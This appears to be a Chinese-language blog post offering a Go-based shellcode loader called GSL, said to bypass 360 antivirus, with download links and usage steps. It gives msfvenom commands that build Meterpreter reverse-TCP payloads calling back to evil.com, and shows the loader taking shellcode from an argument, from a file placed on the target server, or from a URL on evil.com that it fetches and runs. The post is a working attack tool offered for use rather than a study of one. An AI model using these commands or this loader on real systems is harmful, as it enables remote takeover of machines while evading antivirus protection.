【GSL】 从内存加载 SHELLCODE 绕过AV查杀

根据 go-shellcode 修改,原作者用命令行传 SHELLCODE 的方式有点麻瓜,所以修改了一番。

亲测可绕 360全家桶。

X86 & X64 的 SHELLCODE 都可以,用对应 gsl 加载就行了。

下载:【X86】 【X64

为减小体积,已用 UPX 加壳压缩。

食用方法

首先要准备好 SHELLCODE,支持 MSF 的 RAWHEX 格式。

生成 SHELLCODE

X86

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=evil.com LPORT=666 -f raw > evil.raw

X64

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=evil.com LPORT=666 -f hex > evil.hex

加载 SHELLCODE

有三种方式。

0X01

从参数传入 (必须是HEX格式)

1
gsl -s SHELLCODE -hex

0X02

从文件传入,需要先把 SHELLCODE 文件传到目标服务器上

  • 加载 RAW 格式

    1
    gsl -f evil.raw
  • 加载 HEX 格式

    1
    gsl -f evil.hex -hex

0X03

从远程服务器加载,把 SHELLCODE 文件挂在WEB目录下。(支持HTTP/HTTPS)

  • 加载 RAW 格式

    1
    gsl -u http://evil.com/evil.raw
  • 加载 HEX 格式

    1
    gsl -u http://evil.com/evil.hex -hex
文章目录
  1. 1. 食用方法
    1. 1.1. 生成 SHELLCODE
      1. 1.1.1. X86
      2. 1.1.2. X64
    2. 1.2. 加载 SHELLCODE
      1. 1.2.1. 0X01
      2. 1.2.2. 0X02
      3. 1.2.3. 0X03
|